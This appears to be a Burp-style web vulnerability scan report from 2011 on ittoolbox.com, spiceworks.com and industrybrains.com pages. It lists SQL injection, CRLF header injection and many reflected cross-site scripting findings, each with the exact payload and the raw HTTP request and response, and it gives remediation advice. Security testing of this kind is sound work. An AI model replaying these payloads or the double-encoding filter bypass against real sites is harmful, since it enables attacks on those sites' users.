11.40. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168

11.41. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815

11.42. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129

11.43. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832

11.44. http://it.toolbox.com/blogs/ppmtoday/monthly/

11.45. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376

11.46. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207

11.47. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509

11.48. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195

11.49. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720

11.50. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

11.51. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924

11.52. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008

11.53. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071

11.54. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847

11.55. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067

11.56. http://it.toolbox.com/blogs/start

11.57. http://it.toolbox.com/communities/

11.58. http://it.toolbox.com/companies/

11.59. http://it.toolbox.com/companies/white-papers/

11.60. http://it.toolbox.com/groups/

11.61. http://it.toolbox.com/home/recover-password

11.62. http://it.toolbox.com/home/register

11.63. http://it.toolbox.com/home/search/

11.64. http://it.toolbox.com/home/signin

11.65. http://it.toolbox.com/jobs/

11.66. http://it.toolbox.com/people/

11.67. http://it.toolbox.com/people/dentrekin/

11.68. http://it.toolbox.com/topics/

11.69. http://it.toolbox.com/wiki/index.php/CommunityTopic

11.70. http://java.ittoolbox.com/

11.71. http://knowledgemanagement.ittoolbox.com/

11.72. http://linux.ittoolbox.com/

11.73. http://networking.ittoolbox.com/

11.74. http://oracle.ittoolbox.com/

11.75. http://peoplesoft.ittoolbox.com/

11.76. http://pragdave.pragprog.com/

11.77. http://projectmanagement.ittoolbox.com/

11.78. http://sap.ittoolbox.com/

11.79. http://security.ittoolbox.com/

11.80. http://sethgodin.typepad.com/

11.81. http://siebel.ittoolbox.com/

11.82. http://storage.ittoolbox.com/

11.83. http://supplychain.ittoolbox.com/

11.84. http://teamsupport.com/

11.85. http://telephony.ittoolbox.com/

11.86. http://twitter.com/toolboxdotcom

11.87. http://twitter.com/toolboxforit

11.88. http://unix.ittoolbox.com/

11.89. http://visualbasic.ittoolbox.com/

11.90. http://webdesign.ittoolbox.com/

11.91. http://windows.ittoolbox.com/

11.92. http://wireless.ittoolbox.com/

11.93. http://www.ebizq.net/blogs/saasweek/

11.94. http://www.facebook.com/pages/Toolboxcom/117012708708

11.95. http://www.industrybrains.com/signupgroup/Welcome_IB.aspx

11.96. http://www.manageengine.com/products/desktop-central/index.html

11.97. http://www.manageengine.com/products/service-desk/index.html

11.98. http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html

11.99. http://www.pbs.org/cringely/pulpit/

11.100. http://www.roughtype.com/

11.101. http://www.socialcustomer.com/

11.102. http://www.spiceworks.com/features/

11.103. http://www.toolbox.com/

11.104. http://www.toolbox.com/Feedback.aspx

11.105. http://www.toolbox.com/PrivacyPolicy.aspx

11.106. http://www.toolbox.com/TermsofUse.aspx

11.107. http://www.toolbox.com/about/

11.108. http://www.toolbox.com/careers/

11.109. http://www.toolbox.com/contact/

11.110. http://www.toolbox.com/it/advertising/

11.111. http://www.toolbox.com/news/

12. Email addresses disclosed

12.1. http://icdn.toolbox.com/BUILD_1414/js/omniture.js

12.2. http://icdn.toolbox.com/BUILD_1414/js/z.omniture.js

12.3. http://it.toolbox.com/jobs/

12.4. http://sethgodin.typepad.com/

12.5. http://www.industrybrains.com/signupgroup/Welcome_IB.aspx

12.6. http://www.toolbox.com/PrivacyPolicy.aspx

12.7. http://www.toolbox.com/TermsofUse.aspx

12.8. http://www.toolbox.com/it/advertising/

13. Credit card numbers disclosed

14. HTML does not specify charset

14.1. http://cdn.toolbox.com/BUILD_1414/

14.2. http://it.toolbox.com/blogs/ppmtoday/categories/future+states/2379

14.3. http://it.toolbox.com/blogs/ppmtoday/categories/recommended+reading/1191

14.4. http://it.toolbox.com/blogs/ppmtoday/categories/thinking+out+loud/2765

14.5. http://it.toolbox.com/blogs/ppmtoday/categories/war+stories/1192

14.6. http://it.toolbox.com/blogs/ppmtoday/categories/white+papers/1193

14.7. http://jlinks.industrybrains.com/favicon.ico

14.8. http://links.industrybrains.com/click

14.9. http://www.pbs.org/cringely/pulpit/

15. HTML uses unrecognised charset

16. Content type incorrectly stated

16.1. http://businessintelligence.ittoolbox.com/controls/NewsFeed/HomeFeedPolling.aspx

16.2. http://c.ittoolbox.com/controls/NewsFeed/HomeFeedPolling.aspx

16.3. http://infotechtoolbox.tt.omtrdc.net/m2/infotechtoolbox/mbox/standard

16.4. http://it.toolbox.com/api/ctatools/CreateCookie.aspx

16.5. http://it.toolbox.com/blogs/ppmtoday/categories/future+states/2379

16.6. http://it.toolbox.com/blogs/ppmtoday/categories/recommended+reading/1191

16.7. http://it.toolbox.com/blogs/ppmtoday/categories/thinking+out+loud/2765

16.8. http://it.toolbox.com/blogs/ppmtoday/categories/war+stories/1192

16.9. http://it.toolbox.com/blogs/ppmtoday/categories/white+papers/1193



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.spiceworks.com
Path:   /features/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053833957570; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!-- Google Website
...[SNIP]...
<p class="testimonial">...If you're not using Spiceworks for your IT support, you're failing at IT!... &mdash;Don Mcgee, Sys Admin, Southwestern Michigan College</p>
...[SNIP]...

Request 2

GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053834098236; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!-- Google Website
...[SNIP]...

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://links.industrybrains.com
Path:   /click

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 96bfd%0d%0ad5bb6e4fc22 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243&ltype=JSCR&lname=560x350v1&url=96bfd%0d%0ad5bb6e4fc22 HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Connection: close
Date: Wed, 26 Jan 2011 14:56:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO DSP COR CURa "
Location: 96bfd
d5bb6e4fc22

Content-Type: text/html
Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095602@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:56:02 GMT;domain=IndustryBrains.com;


3. Cross-site scripting (reflected)  previous  next
There are 132 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://businessintelligence.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16b86'-alert(1)-'6a6fa7ccdab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?16b86'-alert(1)-'6a6fa7ccdab=1 HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79438
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bjqkbtz41tqi0tz1vwqauvui; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Business In
...[SNIP]...
sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fbusinessintelligence.ittoolbox.com%2fDefault.aspx%3f16b86'-alert(1)-'6a6fa7ccdab%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.2. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://businessintelligence.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ae76"style="x:expression(alert(1))"53ed7d380a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0=1 HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79550
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yv5ih0yuwac45q45l000zbqa; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Business In
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://businessintelligence.ittoolbox.com/Default.aspx?6ae76"style="x:expression(alert(1))"53ed7d380a0=1" />
...[SNIP]...

3.3. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc95f"style="x:expression(alert(1))"2625c8d25b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5=1 HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73655
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=umajk545hmb1st451f0cu145; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   C Languages
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://c.ittoolbox.com/Default.aspx?fc95f"style="x:expression(alert(1))"2625c8d25b5=1" />
...[SNIP]...

3.4. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14422'-alert(1)-'6b0fc08769a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?14422'-alert(1)-'6b0fc08769a=1 HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73542
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b0n14gf40bjjvn55mwg00vvm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   C Languages
...[SNIP]...
(sender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fc.ittoolbox.com%2fDefault.aspx%3f14422'-alert(1)-'6b0fc08769a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.5. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99172'-alert(1)-'cb720188f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?99172'-alert(1)-'cb720188f25=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=o3d0rzjtwft0qdf140t44su3; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CIO Communi
...[SNIP]...
ender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fDefault.aspx%3f99172'-alert(1)-'cb720188f25%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.6. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c54c"style="x:expression(alert(1))"d1341797eaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71115
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3l54b45qxnbq2b5b15znt45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CIO Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://cio.ittoolbox.com/Default.aspx?3c54c"style="x:expression(alert(1))"d1341797eaf=1" />
...[SNIP]...

3.7. http://cio.ittoolbox.com/events/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33953'-alert(1)-'e02096512e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/?33953'-alert(1)-'e02096512e=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39061
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4b34uq55akkdny450wll2255; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fevents%2fdefault.aspx%3f33953'-alert(1)-'e02096512e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.8. http://cio.ittoolbox.com/groups/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /groups/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c37ce'-alert(1)-'a7fd1789ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /groups/?c37ce'-alert(1)-'a7fd1789ef1=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131301
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a3abyt3ubus1p2uuqjogce45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
& sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fgroups%2fdefault.aspx%3fc37ce'-alert(1)-'a7fd1789ef1%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.9. http://cio.ittoolbox.com/research/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /research/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33008'-alert(1)-'9d7f961f948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /research/?33008'-alert(1)-'9d7f961f948=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98082
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hkqgj0zgaipxtz45glhsdjap; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
nder != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fresearch%2fResearchSection.aspx%3f33008'-alert(1)-'9d7f961f948%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.10. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cloud.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840b5"style="x:expression(alert(1))"4766cc8d795 in the application's response.

